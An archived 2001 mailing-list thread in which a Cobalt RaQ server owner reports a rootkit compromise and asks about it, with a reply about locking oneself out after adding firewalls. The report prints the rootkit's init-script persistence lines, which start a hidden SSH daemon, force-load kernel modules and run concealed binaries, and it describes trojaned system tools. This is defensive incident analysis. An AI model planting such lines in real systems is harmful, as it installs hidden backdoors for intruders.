[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [cobalt-users] Recent Hacks (resolution in sight)
- Subject: RE: [cobalt-users] Recent Hacks (resolution in sight)
- From: "Chris Mason" <chris@xxxxxx>
- Date: Fri Feb 9 04:56:17 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
You think you have problems! I got so paranoid with all this talk of cracked
machines that I rushed this morning to install ipchains, pmfirewall,
portsentry, and logcheck. I only use SSH, I've disabled telnet.
Unfortunately I was a little careless in my installation and I have now
totally locked myself out of the machine. I can't ssh, there's no telnet,
the gui is not available as I installed a certificate, I don't know what
next to do. Even tech support at the hosting location may not be able to get
in!
Any ideas?
Chris Mason
Box 340, The Valley, Anguilla, British West Indies
Tel: 264 497 5670 Fax: 264 497 8463
USA Fax (561) 382-7771
Take a virtual tour of the island
http://net.ai/ The Anguilla Guide
Find out more about NetConcepts
www.netconcepts.ai
Talk to me in real time with Instant Messenger: masonc92@xxxxxxxxxxx
-----Original Message-----
From: cobalt-users-admin@xxxxxxxxxxxxxxx
[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of inc
Sent: Friday, February 09, 2001 8:35 AM
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: [cobalt-users] Recent Hacks (resolution in sight)
thanks to those who maintained email with me today; it's been a great help.
here's my report:
i've successfully (touch wood) used the unhack.pl script recommended by
Steve Bassi via Mike Fritsch.
after running unhack.pl, there's one file that unhack said was neither
hacked (according to its internal MD5 checksums) nor "original" cobalt.
this file, /etc/rc.d/init.d/network contains the following which i would say
is part of the hack.
/usr/bin/ssh2d -q
if test -f "/dev/kmod"; then
/sbin/insmod -f /usr/lib/crth.o
/sbin/insmod -f /usr/lib/crtz.o
fi
if test -f /lib/security/.config/sn ; then
cd /lib/security/.config;./lpsched
fi
touch /var/lock/subsys/network
if test -f "/dev/dos"; then
/usr/lib/lpq
fi
;;
i've not installed ssh2d, and crth.o and crtz.o look damned nasty to me.
note that unhack.pl DOESN'T clear up crtz.o. can anyone shed some light on
the remaining commands there? i've disabled all these lines until i know
what they are. my "network" script was considerably more complicated than
the "network" script included with unhack.tar.gz
i also spent the whole day studying up on cracking and studying the scripts
and binaries that were placed on my raq.
the only weird thing i could find in my logs was an ftp login from korea. i
have not published any ftp site urls anywhere, and this is the only ftp
login i've ever seen in the logs apart from my own, and the 127.0.0.1
entries used by the admin. this ftp login occurred 4 hours before the
rootkit was activated.
so i would think that proftpd was exploited to gain root access.
all log entries bar the ftp one above were cleaned up, but there were
footsteps left behind in /.bash_history which reflected an rcp download from
a us .edu site.
at this point ps, su, all manner of executables are replaced to hide any
unusual activity. flash22 suggested i try "top" -- which lo and behold
turned up all my logins running as "/bin/xlogin" -- which appeared to be a
copy of the original cobalt "/bin/login" .. a file /etc/ld.so.hash seems to
have a crypted password in it. the replaced "/bin/login" was a very small
file next to the original cobalt "/bin/login".
i'm happy to answer any questions on this.
thanks again to those who helped me climb out of the black hole!
--
chris paul
fastmedia.net
_______________________________________________
cobalt-users mailing list
cobalt-users@xxxxxxxxxxxxxxx
To Subscribe or Unsubscribe, please go to:
http://list.cobalt.com/mailman/listinfo/cobalt-users